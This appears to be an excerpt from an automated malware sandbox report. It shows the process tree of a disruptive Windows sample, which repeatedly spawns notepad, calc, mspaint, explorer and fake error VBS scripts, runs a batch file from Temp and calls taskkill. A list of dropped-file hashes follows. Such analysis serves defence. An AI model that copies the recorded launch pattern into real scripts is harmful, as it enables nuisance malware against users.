- Kills process with taskkill
PID:13968
-
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:12820
-
-
C:\Windows\system32\calc.execalc7⤵PID:13100
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:6988
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:12724
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:13364
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\89C8.tmp\89C9.tmp\89CA.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:13856
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:13672
-
-
C:\Windows\system32\calc.execalc7⤵PID:13948
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:14128
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:14268
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:14432
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:15216
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:14872
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:7096
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:6528
-
-
C:\Windows\system32\calc.execalc5⤵PID:7264
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:7416
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:7528
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:8812
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:8536
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:4036
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:8820
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:2396
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:8952
-
-
-
-
C:\Windows\system32\notepad.exenotepad3⤵PID:1980
-
-
C:\Windows\system32\calc.execalc3⤵PID:4828
-
-
C:\Windows\explorer.exeexplorer.exe3⤵PID:3916
-
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵PID:1952
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵PID:5300
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵PID:5340
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵PID:5524
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵PID:5620
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵PID:5752
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵PID:5884
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:2560
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:3208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵PID:1968
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:5176
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:6352
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:6636
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:6972
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:7000
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:7396
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:7520
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:6500
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:6960
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:6676
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:10640
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:8720
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:3744
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:9800
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:11720
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:12176
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:11732
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:12656
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:12852
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:13116
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:6504
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:9656
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:13580
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:13820
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:14260
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:12480
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:14392
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵PID:2816
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:7160
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
87B
MD5ec687bebeb045b0b7b30ac9742ff70f2
SHA18c48b82b81d6c1a546215caf58a9d56890872b14
SHA2565e2e70a75b88f3de0a6eaecfbfb6b08d162420bc7046659f8afcacefc2de5d3b
SHA512fd24d4f4e5c891c67f2ba31068f9604ffaead75744f7ccba7a2ad9c1e6c98eff90ac7743420fe5f668aba3ff6a29a9addb176fc27e54272899cb1263b587219c
-
Filesize
11B
MD59905e5a33c6edd8eb5f59780afbf74de
SHA164b2cd0186ff6fe05072ee88e2bb54476023772e
SHA256c134b2f85415ba5cfce3e3fe4745688335745a9bb22152ac8f5c77f190d8aee3
SHA512e10711d0fb09db27192e9af05ae45b83cf3882d98e904a7f1f969cf24c2f9626f70f35d76f57477fe9c64a58bc74100410740e9d506d4e72d3e2900d6277816e
-
Filesize
44B
MD5ea260c435f9eb83e2b5041e734ff3598
SHA1ca70d64367cbdffbbf24e82baff4048119203a2e
SHA2563ade659fdae17c11c3f42b712f94045691fbd0b413428b73e1de8fe699e74615
SHA512548624cc523aeb4136376f792d23b3f2aee4a676362f8a0dd0e8161f0df87ab926b82f67fc174eb5d9473c23f49e6ca962bc84479967f7e624250d94efa66876
-
Filesize
49B
MD5cfb046d3c9513b92c1b287da26f97c28
SHA1ea8208c4dad826b7fdb3b5b728863a95e86d4383
SHA256a06f170d4f92bf290e38b0ce1c05bb59c95de2797b1a5253b949ad7e1be9818b
SHA512dbeeea4d284f59e1455a5426334caa02458e88833aeece9817c51be616697ca4c399b2a9d0e8e44bf4a5ee63d0b37c0aed68c01f1748fa5a23ed6d2af62b3340
-
Filesize
3KB
MD58e052b3f71a9a934259bf564fae3a002
SHA174e4a3f0310a9f7fd3e6ace99172a977a273f029
SHA256245b7cfffd06b696c1ece0c2af38e5b401a3fc9a2cf284cb2fa5193c850c9522
SHA512ddfc5a1fc23474826348e701ce3a872c02fbfcff7f5f384643f26b11b0e04a74d336682e9964eedf6b1c40d5b8e540d90b8811cbf154c14b59d0c518354b21cb
-
Filesize
4KB
MD566dd6cb732b6063d3f9828bc8341fd1d
SHA10155b876cfca62ad60388a014d2e85a193270570
SHA2569bdaae099bc14600d4f9dff462b49368a77576cb08a7d9a2d91424442f9ccc97
SHA5123efb4d2c86b8697393a24a34659566ec36fea289a1c8ab5c1b88741ffe0e43a712e994eec679cb9cbb454bfe895f6577da28d0b35fc00b48d678e19e1da43e85
-
Filesize
6KB
MD5c01fa1f5858c5946ae5a8ae2ef3be2c2
SHA1640ed846bf63b22841e548a6d999461157263ad8
SHA256c2e667f702990ffc25cc741fc9b43b71880cfe75e065fed1f176256fa7d26b94
SHA5125629b22fd806071e702d015ab78b906c7621eb954d980d4169b6b77da14494e570f39209d253a428613a9d5313960a0d93cc66b1bfdb655613bd663f0b34afba
-
Filesize
7KB
MD525014a96aa59218f02bd2064db0b0776
SHA1198ec67172bdd0d0bae961cdd6acd08ce773f388
SHA256850e38338978222a1a6ac34e719ecd8e5f801c203e001aeaf9df191aee31b628
SHA512b90fa802cac96f504df774ee9035c3083842c42d4075f45c1f78d6ecedbccb7e4a839db617544732882814bf2b69fd6892790e7afdd8dc4932705bfb3c4475fe
-
Filesize
9KB
MD57010014adedf4e3c230219ab9ac29d33
SHA1ef2f4d3287b184ae5eb7445b88b39d6c3af8d8f0
SHA2561c42b10d52821ddf67f3a62104931abcbfe2196a203e6b2bea7a9afa8eb477df
SHA5128bf7fde4938016a32133301b7b1ceb5646e49a072ca27ec3fc87d08bdfadf8f12c3a6dfd1d1ade95380ec205771fcd160b319f7805087764dda1ea83288dfafe